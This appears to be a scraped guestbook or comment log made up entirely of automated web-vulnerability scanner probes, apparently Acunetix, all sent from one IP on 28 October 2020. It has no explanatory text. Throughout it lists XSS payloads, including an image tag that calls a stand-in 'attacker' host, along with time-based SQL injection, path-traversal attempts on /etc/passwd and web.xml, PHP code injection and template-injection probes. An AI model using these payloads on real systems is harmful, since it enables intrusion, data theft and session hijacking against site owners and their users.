GRLpGpAG"sTYLe='acu:Expre/**/SSion(93vd(9511))'bad=" [116.113.93.82] 2020-10-28 20:34:12

1

[116.113.93.82] 2020-10-28 20:34:10

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%39%33%76%64%28%39%38%37%30%29%22 [116.113.93.82] 2020-10-28 20:34:08

1

GRLpGpAG\u0022onmouseover=93vd(9809)\u0022 [116.113.93.82] 2020-10-28 20:34:06

1

GRLpGpAG" O5wu=93vd([!+!]) vke=" [116.113.93.82] 2020-10-28 20:34:04

1

GRLpGpAG"onmouseover=93vd(9088)" [116.113.93.82] 2020-10-28 20:34:02

1

GRLpGpAG<zM7NiS< [116.113.93.82] 2020-10-28 20:33:59

1

GRLpGpAG<img sRc='http://attacker-9088/log.php? [116.113.93.82] 2020-10-28 20:33:57

1

GRLpGpAG<JP24nR x=9582> [116.113.93.82] 2020-10-28 20:33:54

1

GRLpGpAG<ifRAme sRc=9388.com></IfRamE> [116.113.93.82] 2020-10-28 20:33:52

1

GRLpGpAG<WYSLVA>SAGCA[!+!]</WYSLVA> [116.113.93.82] 2020-10-28 20:33:50

1

GRLpGpAGeU0Sm <ScRiPt >93vd(9034)</ScRiPt> [116.113.93.82] 2020-10-28 20:33:47

1

GRLpGpAG<% contenteditable onresize=93vd(9910)> [116.113.93.82] 2020-10-28 20:33:45

1

GRLpGpAG}body{acu:Expre/**/SSion(93vd(9156))} [116.113.93.82] 2020-10-28 20:33:43

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9352);//><!-- --> [116.113.93.82] 2020-10-28 20:33:40

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 20:33:38

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 20:33:36

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 20:33:33

1

GRLpGpAG<input autofocus onfocus=93vd(9752)> [116.113.93.82] 2020-10-28 20:33:30

1

[116.113.93.82] 2020-10-28 20:33:28

1

GRLpGpAG<ScRiPt>93vd(9229)</sCripT> [116.113.93.82] 2020-10-28 20:33:26

1

GRLpGpAG\u003CScRiPt\93vd(9464)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 20:33:24

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%39%33%76%64%289414%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 20:33:21

1

GRLpGpAG<img/src=">" onerror=alert(9849)> [116.113.93.82] 2020-10-28 20:33:19

1

GRLpGpAG<img src=xyz OnErRor=93vd(9313)> [116.113.93.82] 2020-10-28 20:33:17

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=93vd(9877)> [116.113.93.82] 2020-10-28 20:33:14

1

GRLpGpAG<body onload=93vd(9544)> [116.113.93.82] 2020-10-28 20:33:12

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9959'> [116.113.93.82] 2020-10-28 20:33:09

1

GRLpGpAG<isindex type=image src=1 onerror=93vd(9778)> [116.113.93.82] 2020-10-28 20:33:07

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 20:33:05

1

GRLpGpAG<video><source onerror="javascript:93vd(9476)"> [116.113.93.82] 2020-10-28 20:33:03

1

GRLpGpAG<ScRiPt >93vd(9571)</ScRiPt> [116.113.93.82] 2020-10-28 20:33:00

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9353></ScRiPt> [116.113.93.82] 2020-10-28 20:32:58

1

GRLpGpAG<ScRiPt >93vd(9344)</ScRiPt> [116.113.93.82] 2020-10-28 20:32:56

1

GRLpGpAG<ScR<ScRiPt>IpT>93vd(9211)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 20:32:54

1

GRLpGpAG<script>93vd(9635)</script> [116.113.93.82] 2020-10-28 20:32:51

1

GRLpGpAG<WUN9VZ>R9NQ0[!+!]</WUN9VZ> [116.113.93.82] 2020-10-28 20:32:49

1

GRLpGpAG<ScRiPt >93vd(9012)</ScRiPt> [116.113.93.82] 2020-10-28 20:32:47

1

{{10000281*9999897}} [116.113.93.82] 2020-10-28 20:32:44

1

acux10554 [116.113.93.82] 2020-10-28 20:32:42

1

acu10381<s1﹥s2ʺs3ʹuca10381 [116.113.93.82] 2020-10-28 20:32:39

1

{{9999186*10000415}} [116.113.93.82] 2020-10-28 20:32:37

1

acux7591 [116.113.93.82] 2020-10-28 20:32:35

1

acu10480<s1﹥s2ʺs3ʹuca10480 [116.113.93.82] 2020-10-28 20:32:32

1

GRLpGpAG9799894 [116.113.93.82] 2020-10-28 20:32:30

1

'"()&%<acx><ScRiPt >93vd(9522)</ScRiPt> [116.113.93.82] 2020-10-28 20:32:27

1

GRLpGpAG'"()&%<acx><ScRiPt >93vd(9367)</ScRiPt> [116.113.93.82] 2020-10-28 20:32:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:23

1<KTihFU<

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:21

1<img sRc='http://attacker-9514/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:18

1<5y698T x=9833>

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:16

1<ifRAme sRc=9696.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:14

1<WTP6OT>MZNM8[!+!]</WTP6OT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:11

107L7H <ScRiPt >93vd(9235)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:09

1<% contenteditable onresize=93vd(9507)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:07

1}body{acu:Expre/**/SSion(93vd(9050))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:05

1<img<!-- --> src=x onerror=alert(9600);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:02

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:59

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:57

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:55

1<input autofocus onfocus=93vd(9765)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:52

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:50

1<ScRiPt>93vd(9249)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:47

1\u003CScRiPt\93vd(9798)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:46

%31%3C%53%63%52%69%50%74%20%3E%39%33%76%64%289765%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:43

1<img/src=">" onerror=alert(9001)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:41

1<img src=xyz OnErRor=93vd(9819)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:38

1<img src=//testasp.vulnweb.com/t/dot.gif onload=93vd(9888)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:36

1<body onload=93vd(9408)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:34

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9648'>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:32

1<isindex type=image src=1 onerror=93vd(9221)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:29

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:27

1<video><source onerror="javascript:93vd(9978)">

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:25

1<ScRiPt >93vd(9309)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:23

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9454></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:20

1<ScRiPt >93vd(9029)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:18

1<ScR<ScRiPt>IpT>93vd(9320)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:16

1<script>93vd(9087)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:14

1<WHKTIS>HFITI[!+!]</WHKTIS>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:11

1<ScRiPt >93vd(9625)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:08

{{9999742*9999433}}

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:06

acux3773

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:04

acu10470<s1﹥s2ʺs3ʹuca10470

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:02

19593327

GRLpGpAG [116.113.93.82] 2020-10-28 20:31:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:59

'"()&%<acx><ScRiPt >93vd(9082)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:57

1'"()&%<acx><ScRiPt >93vd(9110)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:54

1

GRLpGpAG [116.113.93.82<RjcpSv<] 2020-10-28 20:30:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:52

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9659/log.php?] 2020-10-28 20:30:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:48

1

GRLpGpAG [116.113.93.82<LWk0QW x=9945>] 2020-10-28 20:30:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:46

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9571.com></IfRamE>] 2020-10-28 20:30:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:44

1

GRLpGpAG [116.113.93.82<WUAXOB>8XX1S[!+!]</WUAXOB>] 2020-10-28 20:30:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:42

1

GRLpGpAG [116.113.93.82RaTH1 <ScRiPt >93vd(9347)</ScRiPt>] 2020-10-28 20:30:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:40

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=93vd(9334)>] 2020-10-28 20:30:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:37

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(93vd(9020))}] 2020-10-28 20:30:37

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9683);//><!-- -->] 2020-10-28 20:30:35

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 20:30:33

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 20:30:30

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 20:30:28

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=93vd(9959)>] 2020-10-28 20:30:26

1

GRLpGpAG [] 2020-10-28 20:30:24

1

GRLpGpAG [116.113.93.82<ScRiPt>93vd(9835)</sCripT>] 2020-10-28 20:30:21

1

GRLpGpAG [116.113.93.82\u003CScRiPt\93vd(9202)\u003C/sCripT\u003E] 2020-10-28 20:30:19

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 20:30:17

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:30:17

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%39%33%76%64%289340%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 20:30:17

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:30:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:16

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 20:30:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:15

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9443)>] 2020-10-28 20:30:15

1

file:///etc/passwd [116.113.93.82] 2020-10-28 20:30:14

1

6bfp8YEq'));select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:30:14

1

ifbFeAnc');select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:30:13

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=93vd(9709)>] 2020-10-28 20:30:12

1

mTNguoci';select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:30:12

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 20:30:11

1

8RhVsbXE'; waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:30:10

1

.. [116.113.93.82] 2020-10-28 20:30:10

1

1 waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:30:09

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=93vd(9262)>] 2020-10-28 20:30:09

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 20:30:09

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ [116.113.93.82] 2020-10-28 20:30:08

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 20:30:07

1

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z [116.113.93.82] 2020-10-28 20:30:07

1

GRLpGpAG [116.113.93.82<body onload=93vd(9144)>] 2020-10-28 20:30:07

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 20:30:07

1

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z [116.113.93.82] 2020-10-28 20:30:06

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 20:30:06

1

if(now()=sysdate(),sleep(3),0) [116.113.93.82] 2020-10-28 20:30:06

1

/etc/passwd [116.113.93.82] 2020-10-28 20:30:05

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9785'>] 2020-10-28 20:30:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:04

1

-1" OR 2+922-922-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:30:04

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 20:30:04

1

-1' OR 2+296-296-1=0+0+0+1 or 'VZboAmQ6'=' [116.113.93.82] 2020-10-28 20:30:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:03

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 20:30:03

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=93vd(9436)>] 2020-10-28 20:30:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:02

1

-1' OR 2+982-982-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:30:02

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 20:30:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:30:01

1

-1 OR 2+156-156-1=0+0+0+1 [116.113.93.82] 2020-10-28 20:30:01

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 20:30:01

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 20:30:00

1

-1 OR 2+996-996-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:30:00

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 20:30:00

1

AnRdg4CM [116.113.93.82] 2020-10-28 20:29:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:59

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 20:29:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:58

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 20:29:57

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:93vd(9930)">] 2020-10-28 20:29:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:57

WEB-INF\web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:56

AGXhiAea'));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:56

WEB-INF/web.xml

GRLpGpAG [116.113.93.82<ScRiPt >93vd(9409)</ScRiPt>] 2020-10-28 20:29:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:56

TRxm28sE');select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:55

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:55

DiKcjG3u';select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:54

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9747></ScRiPt>] 2020-10-28 20:29:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:54

-1));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:53

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:53

-1);select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:52

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:52

-1;select pg_sleep(6); --

GRLpGpAG [116.113.93.82<ScRiPt >93vd(9000)</ScRiPt>] 2020-10-28 20:29:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:51

..

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:50

W3ZYZET7'; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:50

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[116.113.93.82] 2020-10-28 20:29:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:49

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:49

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>93vd(9879)</sCr<ScRiPt>IpT>] 2020-10-28 20:29:49

1

[116.113.93.82] 2020-10-28 20:29:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:48

-1); waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:48

/.././.././.././.././.././.././.././../etc/./passwd%00

JyI= [116.113.93.82] 2020-10-28 20:29:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:47

-1; waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:47

%2fetc%2fpasswd

@@2o62E [116.113.93.82] 2020-10-28 20:29:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:47

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

GRLpGpAG [116.113.93.82<script>93vd(9687)</script>] 2020-10-28 20:29:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:46

/etc/passwd

1 [116.113.93.82] 2020-10-28 20:29:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:46

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:46

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\ [116.113.93.82] 2020-10-28 20:29:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:45

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:45

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82<WBAHLY>B5X1G[!+!]</WBAHLY>] 2020-10-28 20:29:45

1

1'" [116.113.93.82] 2020-10-28 20:29:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:44

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:43

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:43

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:43

-1" OR 2+445-445-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:42

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:42

GRLpGpAG [116.113.93.82<ScRiPt >93vd(9943)</ScRiPt>] 2020-10-28 20:29:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:42

-1' OR 2+551-551-1=0+0+0+1 or 'dHn2P5lq'='

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:41

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:41

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:40

-1' OR 2+798-798-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:40

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [{{9999349*9999944}}] 2020-10-28 20:29:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:40

@@f6kDP

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:39

-1 OR 2+916-916-1=0+0+0+1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:39

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:38

-1 OR 2+995-995-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:37

\

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:37

3mHKguWl

GRLpGpAG [acux2480] 2020-10-28 20:29:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:37

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:36

1

GRLpGpAG [acu2205<s1﹥s2ʺs3ʹuca2205] 2020-10-28 20:29:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:36

1

<!-- [116.113.93.82] 2020-10-28 20:29:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:34

1

'" [116.113.93.82] 2020-10-28 20:29:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:33

1

GRLpGpAG [116.113.93.829553603] 2020-10-28 20:29:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:33

<!--

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 20:29:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:32

'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:32

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 20:29:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:31

1

GRLpGpAG ['"()&%<acx><ScRiPt >93vd(9201)</ScRiPt>] 2020-10-28 20:29:31

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 20:29:30

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 20:29:30

1

GRLpGpAG [] 2020-10-28 20:29:29

1

create/. [116.113.93.82] 2020-10-28 20:29:29

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 20:29:29

1

GRLpGpAG [<!--] 2020-10-28 20:29:29

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 20:29:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:29

/www.vulnweb.com

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >93vd(9895)</ScRiPt>] 2020-10-28 20:29:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:28

1

GRLpGpAG [] 2020-10-28 20:29:28

1

create [116.113.93.82] 2020-10-28 20:29:28

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 20:29:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:28

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG ['"] 2020-10-28 20:29:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

1

